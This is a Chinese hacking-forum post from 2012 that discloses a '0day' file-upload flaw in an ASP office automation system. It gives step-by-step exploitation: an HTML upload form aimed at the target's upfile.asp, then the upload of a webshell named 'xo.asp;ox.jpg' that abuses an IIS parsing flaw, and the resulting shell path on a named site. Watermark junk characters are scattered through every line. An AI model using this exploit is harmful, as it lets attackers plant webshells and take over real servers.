找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2276|回复: 0
打印 上一主题 下一主题

全能OA办公系统0day OA办公系统漏洞 上传漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-11-21 13:45:12 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
全能OA办公系统 上传漏洞
  a0 W- d6 ~% N' h+ C
* }; r/ ^. S5 r( F6 g. s! `0 A系统介绍:, T# Q- i8 u3 x. a( I
2 K0 \  x+ {* ~( X& L. Q9 A
全能OA办公系统2012是功能非常强大的OA系统,目前功能已完全能满足日常办公需要。% J9 }6 X( \5 o& A' s7 A
2 F# L2 t, a" [# S
主要功能:
& N% S& o, \/ J7 b) N( x5 _; ?2 O公司通告 4 Y# E$ c# A1 C3 H$ R+ I
工作计划 4 t8 ?: V; d8 d
通讯助理
6 s1 {" }1 l, z) I4 o客户资源 , y8 V/ ~/ x( u5 v7 T6 t: U
我的公文 # r5 P5 g- k% o5 O' `  L. X- A* O
公文传阅 7 g; p& I& f8 j: k2 k# X; g
公共资源
1 t5 y$ g; f( t7 q5 p资源预约 , y6 w4 f7 H1 M0 N5 f0 n; }1 ~
今日考勤
1 ?' S0 R6 k& _  n! e6 X5 R个人计划 ; Q* z! h0 _$ M% r1 s1 U. }
个人通讯录
# b. j( S$ `% k' Z个人基本档案 $ f. [  b: L! \/ \
未读邮件 , ~; O4 A2 ?, Z8 n
发邮件 . I" x" _- |9 {! ~- l" E
收件夹 # W; G) K3 d5 v$ {- k  K
寄件夹
! V, T  M! M  ^' U$ y网络硬盘 ( j, e3 p5 D1 v+ U4 f! k! r
网络会议
4 h7 w4 j1 e7 u; ?网络调查 ) L0 ?3 h0 S$ `4 _9 U
交流论坛
1 l& G, g9 x  R7 D/ i( @* ?# |% T, F
有兴趣测试的朋友可以下源码看看6 d) d1 u  R' m; x
! Q3 @5 l+ S* Z" _
源码下载:% H: P& N  s# s) {

0 t% X9 n4 F6 S7 d) Bhttp://www.mycodes.net/30/4750.htm
# I' J7 B; K7 O2 v3 m' u- P/ V8 }9 [' n1 S5 u0 x4 W5 n
漏洞介绍:
& s4 l! H( @8 e" t: G; B. E  S% {+ p% u4 J
由upfile.asp上传文件漏洞引起
1 H8 ]- n3 l7 T) b9 d& r# n( K3 Z1 Y1 W/ F( [
测试方法:: p3 M! n) @% X8 y+ Y5 j) I! F

7 p6 b2 o5 [( ~8 g$ A4 \使用名小子上传http://www.itlynn.com/upfile.asp即可
+ }9 F; H5 M% O, z
: g: }: ^/ k! g2 @如果upfile.asp文件被删除不存在。) z5 _: v0 E$ h% I; x3 h. k, q, h

' d. b5 B" G* U" h  那么可以试着访问http://www.itlynn.com/upfile/upfile.asp
% T* a% A! g6 k8 V. l3 M: l* G+ E; c6 l* U6 t  ^% G
如果存在那么将如下代码保存为upfile.html。1 ^+ k  H6 @  H& _" }

$ Q1 V) F; g) A4 B! I4 s然后将action的参数修改为目标站点的url。例如 http://www.itlynn.com/upfile/upfile.asp
1 @$ Y. J/ N# U* t% C
: e( @( [3 N; ]2 ]+ K' I1 T 2 X1 ?% p3 V# b3 D2 \9 q
! _+ k2 N( c, m* G8 I% J* |  I. n3 v
01 <table border='0' align="center" cellpadding="5">
% e& g8 t+ s3 I% F# K, \. l! H
- m+ Q, ^) d) b) z/ F+ U02 <form method="POST"action="http://www.itlynn.com/upfile/upfile.asp"enctype="multipart/form-data"id="form1"name="form1"> 2 @! j* [- G" w* J& [  z2 @3 t* n
% t* E0 M) J5 ?, ]5 |( O: U
03 <tr>
0 m9 N9 k% \6 H+ N. M/ X: N  i; g$ W
04             <td>报错:</td>
+ G. ~. J' }$ C9 w* D& T1 i1 }; S* K6 ?( R( S. T
05             <td><input type='radio' name='errnumber' value='0'> ( s+ O$ i( W# n6 o

) u( c! q0 G- ]) s5 E$ x5 N2 ^06               自动更名
/ @9 u, N: n! s, v4 n, G2 Z8 y
) u1 x, B) p" K' t07               <input type='radio' name='errnumber' value='1' checked> ; O9 o6 l5 ?3 }5 }
0 `+ l: W: b; O0 R1 o
08               报错方式
& D6 u7 g. c; ?! @; p9 d% U7 w
0 t% H" n% a1 Y8 }; m( k09               <input type='radio' name='errnumber' value='2'> ) H4 I1 z3 p) i; A' x

  Z3 T) ~: J; K0 ]0 ~# V10               直接覆盖</td> ; N8 l2 Y. S4 j7 P! U, \9 ]
" ?: N3 J) }3 W
11           </tr>
. ]% a% y8 U- w! i% n# j# l& F5 A7 q# u9 i4 E
12           <tr>
6 C; K& ~* {& j% f  s4 s
" a$ C1 I/ Q1 k3 q7 a13             <td>主题:</td>
5 c/ h8 l- Y" r  R4 Q0 E, u0 `' U# u% s6 Q
14             <td><input type='text' name='filename' size='30'></td> 2 s$ [# B$ z: Q+ k- D" T2 M
8 l8 r5 x. |9 ^& j
15           </tr> 7 r0 o) t( A3 b1 k9 [
% ?- N: o. ~% K$ h0 w
16           <tr> - E, T4 ]4 L, k8 f; x
( K8 e) L5 r  h( z
17             <td>文件:</td>
- L. q5 @7 v) d# T' M1 p
# G& h# o. \) U0 e4 q! X5 D- V18             <td><input type="file"name="fruit"size="30"></td>
9 F/ L" x/ {, }& A+ K' a- @" m: H3 a! O! t" `$ T
19           </tr> : @* a4 ~/ z3 a8 E0 R

6 \' r% R9 K" }. Q- X) {/ Z" h9 @20           <tr>
' `5 |* e% ]9 l
) l: C( @% F3 c& O0 [0 L, J  `21             <td valign='top'>简介:</td> ; b8 t+ m  w% e  A
7 o1 ^% A/ B) H
22             <td><textarea name='fileExt' cols='40' rows='5'></textarea></td> 7 x' R% h& U% z6 G9 a; |$ U0 Y

/ k6 t- E5 F8 J- Y5 c+ Y. v1 l# d, P23           </tr> 8 H) P! S$ @7 E% T
( B& E# n) h1 g0 K
24   8 [4 b  }; s  p. ^& f
4 ]* F% R/ g6 |
25             <td colspan='2'><input type="submit" value="上传文件" name="subbutt"></td>
( S: Y7 _! O) R# y) p+ A
% n. C4 |8 b; l0 }4 {9 B2 }5 N26           </tr>
# G9 y4 |, i* [& f- h- y. \. o. R4 Y' ]: k9 {$ n
27         </form>
; z8 a- U" f+ J" O! F$ W- [' r& w6 C( ~% }) v7 j$ F" X7 @7 k5 L- {8 k
然后打开上传一个文件名为xo.asp;ox.jpg的文件。
" _3 h3 _5 ~7 a$ Y3 O# s* e& L3 b! G1 f

- f* g3 K" i8 _% w4 u- w( C0 R+ C, y3 k/ s/ `2 e* X
上传成功后,马的路径是:http://www.itlynn.com/upfile/savepath/xo.asp;ox.jpg) A3 ]5 V" M& q. ?
4 _# ]$ {/ \' d. N8 W
此漏洞需要配合解析漏洞利用。" B( N* @8 L, Z5 B  D% R
9 L# Y& |" [% h. _3 f( S
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表